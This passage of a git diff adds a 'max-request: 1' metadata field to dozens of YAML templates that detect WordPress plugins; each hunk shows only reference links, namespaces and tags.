plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 58d5c881d0..3d0073b5a5 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: 